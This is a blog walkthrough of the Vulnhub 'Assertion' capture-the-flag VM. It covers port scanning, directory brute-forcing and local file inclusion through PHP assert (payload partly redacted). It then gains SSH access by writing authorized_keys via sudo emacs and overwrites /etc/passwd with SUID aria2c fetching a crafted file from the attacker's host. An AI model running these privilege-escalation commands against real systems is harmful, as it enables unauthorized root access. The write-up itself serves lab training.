Assertion Vulnhub Walkthrough

I am back with another interesting article , today we are going to solve another VM Assertion from vulnhub , This is an intermediate level challenge . This is my honest walkthrough of this VM.


Walkthrough



IP of the target : 192.168.1.90

As usual I started with nmap scan to find open ports and services running in the system using the command


sudo nmap -sC -sV -Pn -p- 192.168.1.90

On port 80 I found a web application with some different options in navigation bar and after clicking on one of the page I am redirected to that page but I checked the URL and found a GET parameter including the page I clicked on , means this webapp is vulnerable to LFI attack .

I tried to include /etc/passwd file but using ../etc/passwd displayed a message .

I have faced this type of thing in different challenges where "../" is blocked or ".." is blocked and to bypass this I used encoding "../" as well as double encoding "../" but in this VM nothing worked , then I start enumerating again by thinking that this can be a rabbit hole , so next I tried directory bruteforce using the command


wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 --hc 404 http://192.168.1.90/FUZZ

after enumerating each directory I found pages to be interesting .

after opening these pages I found that they are quite similar to those web pages I found in the root directory , and if we focus on the GET parameter then it was something like : /index.php?page=gallery , so I tried including the index.php itself and got this error "File does not exist" , something strange happened here , next I tried to include webpages I just foud in /pages/ and yes it worked , but without extension php , means http://192.168.1.90/index.php?page=gallery , next I tried bypassing this method using "?" and "&" and I also go through a hackerone report but it didn't worked too , after loosing all the hopes I messaged the author of this VM for some hint and he told me "Name of the VM is the hint" , then a php function came in my mind and I started searching about it and hopefully I found something really interesting to get LFI .

', '..') === false and $myfile = **************************************************

umm this looks interesting , next I tried searching for some useful files , may be I can find SSH creds but got nothing , next I started to write some reverse shell script in /tmp/ directory , but till now I haven't get RCE to execute those scripts and after playing sometime with the malicious input I found a way to get RCE .

and that's it , now I can pop a shell :)

its time for some enumeration :) and after searching in some useful directories I found id_rsa keys and after cracking the passphrase with jonh I found the password , and can gain access to user soz shell using these keys and passphrase.

I tried priv. esc. using lxd method but it didn't worked , but when I checked for user privileges I found something interesting

I know that emacs is some kind of file editing tool and we can run this as user fnx means I can create a file inside /home/fnx/.s**/auth******_ke** and can gain access to shell of user fnx.

sudo -u fnx /usr/bin/emacs /home/fnx/.s**/auth*******

and now I pasted my local system's id_rsa.pub keys here and after that using the command ssh -i id_rsa fnx@192.168.1.90 , I gained access to shell of fnx user.

now I checked for the user privileges but found nothing , next I started to search for SUID binaries and find one as /usr/bin/aria2c.

now after checking some methods from gtfobins they didn't worked so I decided to read man page of this tool and after using some of the flags I was able to overwrite the /etc/passwd .


Original /etc/passwd file

now I used the command openssl passwd -1 -salt yash yash to create a username yash and password yash and now I copied the original /etc/passwd file in my local system and edited it like this

aria2c command =>


/usr/bin/area2c --allow-overwrite -o passwd http://192.168.1.103:8000/passwd 

and now I can get root access!

and this completed our challenge , if my walkthrough helps you , then please consider donating us to keep the website advertisement free :)

Recent Posts

See All

Website change notice

As you all know that our website is providing walkthrough of different challenges from different platforms and without any advertisement but due to some funds issue we can't continue this website :( S

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.